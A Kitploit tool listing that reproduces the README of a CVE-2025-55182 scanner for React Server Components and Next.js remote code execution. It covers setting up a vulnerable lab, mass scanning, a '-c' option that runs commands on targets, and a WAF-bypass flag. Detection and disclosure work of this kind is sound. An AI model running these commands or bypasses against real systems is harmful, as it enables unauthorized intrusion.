Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-55182 — CVE-2025-55182(React Server Components 反序列化远程代码执行漏洞) | Kitploit
Tools/GitHubGitHub/xiaolvchen/cve-2025-55182
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationWAF BypassPenetration Testing
GitHubxiaolvchen/cve-2025-55182

CVE-2025-55182

CVE-2025-55182(React Server Components 反序列化远程代码执行漏洞)

View Repository
17 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Affected Versions

ComponentRecommended Version for ReproductionVulnerable Version Range
Node.js>= 20.9.020.9.0 (LTS) and above
Next.js15.0.015.x, 16.x (App Router)
React Core19.0.0 or 19.2.019.0.0 to 19.2.0
RSC Bundlerreact-server-dom-webpack19.0.0 to 19.2.0

Build and Start

  1. Force install lower version

    root@kitploit:~
    cd cve-2025-55182-target
    npm install --force
    
  2. Verify dependency versions

    root@kitploit:~
    npm list react next
    # The output should show [email protected] and [email protected]
    

    As long as the top-level dependency list shows [email protected] and [email protected], the environment is successfully locked into a vulnerable state; warnings and error codes here can be ignored.

  3. Build:

    root@kitploit:~
    npm run build
    
  4. Run:

    root@kitploit:~
    npm start
    

    The server will listen on http://localhost:3000. The environment is set up; vulnerability verification can begin.

Examples

  • Vulnerability Detection/Scanning:

    root@kitploit:~
    cd React2shell
    python3 scanner.py -u http://127.0.0.1:3000/
    
  • RCE:

    root@kitploit:~
    python3 scanner_with_rce.py -u http://127.0.0.1:3000/ -c "ls /"
    

poc

References

react2shell-scanner

react2shell-scanner

A command-line tool for detecting React Server Components (RSC) vulnerabilities CVE-2025-55182 and CVE-2025-66478 in Next.js applications.

For a detailed introduction to the technical details and detection methods of the vulnerabilities, please refer to our blog post: https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478

How It Works

By default, the scanner sends a specially crafted multipart POST request containing an RCE verification payload that performs a deterministic mathematical operation (41*271 = 11111). A vulnerable host will return the result in the X-Action-Redirect response header as /login?a=11111.

The scanner first tests the root path. If the root path is not vulnerable, it follows same-origin redirects (e.g., from / to /en/) and tests the redirect target. Cross-origin redirects are not followed.

Safe Check Mode

Using the --safe-check flag enables safe check mode, which relies on side-channel signals (such as 500 status codes and specific error summaries) without executing code on the target. Use this mode when RCE execution is not desired.

WAF Bypass

Using the --waf-bypass flag adds random junk data before the multipart request body. This helps bypass WAF detection that only analyzes the beginning of the request body. The default size is 128KB and can be configured via --waf-bypass-size. When WAF bypass is enabled, the timeout is automatically increased to 20 seconds (unless explicitly set).

Windows Mode

Using the --windows flag switches the payload from Unix shell (echo $((41*271))) to PowerShell (powershell -c "41*271"), for targets running on Windows.

Requirements

  • Python 3.9+
  • requests
  • tqdm

Installation

root@kitploit:~
pip install -r requirements.txt

Usage

Scan a single host:

root@kitploit:~
python3 scanner.py -u https://example.com

Scan a list of hosts:

root@kitploit:~
python3 scanner.py -l hosts.txt

Scan with multithreading and save results:

root@kitploit:~
python3 scanner.py -l hosts.txt -t 20 -o results.json

Scan with custom headers:

root@kitploit:~
python3 scanner.py -u https://example.com -H "Authorization: Bearer token" -H "Cookie: session=abc"

Scan with safe side-channel detection:

root@kitploit:~
python3 scanner.py -u https://example.com --safe-check

Scan a Windows target:

root@kitploit:~
python3 scanner.py -u https://example.com --windows

Scan with WAF bypass:

root@kitploit:~
python3 scanner.py -u https://example.com --waf-bypass

Execute RCE command:

root@kitploit:~
python3 scanner.py -u https://example.com -c "ls /"

Options

root@kitploit:~
-u, --url         Single URL to check
-c, --cmd         Command to execute
-l, --list        File containing hosts (one per line)
-t, --threads     Number of concurrent threads (default: 10)
--timeout         Request timeout in seconds (default: 10)
-o, --output      Output file to save results (JSON format)
--all-results     Save all results, not only vulnerable hosts
-k, --insecure    Disable SSL certificate verification
-H, --header      Custom request headers (can be used multiple times)
-v, --verbose     Show response details for vulnerable hosts
-q, --quiet       Only output vulnerable hosts
--no-color        Disable colored output
--safe-check      Use safe side-channel detection instead of RCE PoC
--windows         Use Windows PowerShell payload instead of Unix shell
--waf-bypass      Add junk data to bypass WAF content detection
--waf-bypass-size Junk data size in KB (default: 128)

Acknowledgements

The RCE PoC was initially publicly disclosed by @maple3142 — we greatly appreciate their contribution in publishing a usable PoC.

This tool was originally built for safe detection of this RCE. This functionality is still available via the --safe-check safe check mode.

  • Assetnote Security Research Team - Adam Kues, Tomais Williamson, Dylan Pindur, Patrik Grobshäuser, Shubham Shah
  • xEHLE_ - Reflecting RCE output in response headers
  • Nagli

Output

Results are output to the terminal. When using the -o parameter, vulnerable hosts are saved to a JSON file with full HTTP request and response for verification.

Download Tool